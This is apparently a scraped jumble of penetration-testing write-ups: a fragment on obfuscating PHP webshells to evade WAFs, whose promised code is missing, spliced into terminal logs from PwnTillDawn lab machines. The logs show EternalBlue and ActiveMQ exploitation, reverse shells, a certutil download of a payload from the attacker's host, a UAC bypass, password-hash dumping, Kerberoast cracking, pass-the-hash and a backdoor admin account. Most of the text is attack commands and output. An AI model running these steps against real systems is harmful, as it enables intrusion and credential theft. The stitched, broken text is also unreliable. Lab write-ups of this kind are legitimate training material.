For bypass WAF, you can use some techniques to re-write your webshell.
Idea
First, clear ideas. My core idea is to non-letter, the characters of the characters through a variety of changes, and finally construct any az in the characters. And then use PHP to allow dynamic functions to perform the characteristics of splicing a function name, such as “assert”, and then the dynamic implementation of the.
So, the transformation method will be the main point to solve this problem.
But before that, I need to talk about the difference between php5 and 7.
Php5 assert is a function, we can use $f='assert';$f(...);this method to dynamically execute arbitrary code.
But php7, assert is no longer a function, into a language structure (similar to eval), can not be used as a function name dynamic implementation of the code, so use a little more complicated. But there is no need to worry too much, for example, we use the file_put_contents function, the same can be used to gethell.
For the sake of convenience, use PHP5 as the environment, PHP7 related to the use of their own way to explore it.
Method 1
This is the easiest and easiest way to think about it. In PHP, the two strings after the implementation of XOR operation, or a string. So, we want to get a letter in az, to find a two non-letter, the number of characters, their XOR results can be the letter.
PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.
So, how to get a variable for the string ‘a’?
Coarse, the first letter of the array (Array) is capitalized A, and the fourth letter is lowercase a. In other words, we can get both lowercase and capitalized A, which means that we can get az and AZ all the letters.
In PHP, if you want to join arrays and strings, the array will be converted to a string whose value is Array:
And then take the first letter of the string, you can get ‘A’.
Using this technique, I wrote the following webshell (because the PHP function is case insensitive, so we end up doing it ASSERT($_POST[_]):
# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242
Nmap scan report for 10.150.150.242
Host is up (0.031s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
# Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242
rhost => 10.150.150.242
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242
rhosts => 10.150.150.242
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.66.66.210:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 3660 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\users\Administrator.GNBUSCA-W054\desktop>whoami
whoami
nt authority\system
c:\users\Administrator.GNBUSCA-W054\desktop>
c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt
type FLAG34.txt
c2e9e102e55d5697ed2f9a7ea63708c1cc411b79
c:\Users\Administrator.GNBUSCA-W054\Desktop>
c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.
c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.
connect with rdp
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #
$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 10.150.150.69:445 – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.
cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run
[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >
flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962
However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
105/tcp open csnet-ns
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
554/tcp open rtsp
1883/tcp open mqtt
2224/tcp open efi-mg
2869/tcp open icslap
3306/tcp open mysql
5672/tcp open amqp
8009/tcp open ajp13
8080/tcp open http-proxy
8089/tcp open unknown
8161/tcp open patrol-snmp
10243/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49251/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
Next we browse to
Welcome to the Apache ActiveMQ!
http://10.150.150.219:8161/
it has an msf exploit
https://www.exploit-db.com/exploits/42283
.
.
msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options
Module options (exploit/windows/http/apache_activemq_traversal_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Windows Java
msf6 exploit(windows/http/apache_activemq_traversal_upload) > run
[*] Started reverse TCP handler on 10.66.66.210:4444
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100
C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user
C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32
Directory of c:\puck
08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free
c:\puck>
start the listener , and then execute c:\puck>7777.exe
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.66.66.210:7777
msf6 exploit(multi/handler) >
.
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
c:\puck>7777.exe
7777.exe
c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100
c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter >
meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\puck>whoami
whoami
hollywood\user
c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter >
Background session 2? [y/N]
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.150.150.219 - Collecting local exploits for x86/windows...
[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)
msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
Roast
C:\Windows\system32>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt0042894e0a6b2bc2c4517c5f7ccc5c16
First, download the file and unzip it.
In order to resolve this challenge, you need to decrypt something called “cpassword” that is easy thanks to this:“Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025).”
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/
Once downloaded you have to find the following file inside the unzipped challenge file: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is broken. You need to add “=” at the end to make it fine.
Once done, execute the program with that base64 password and you will get the following:
Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.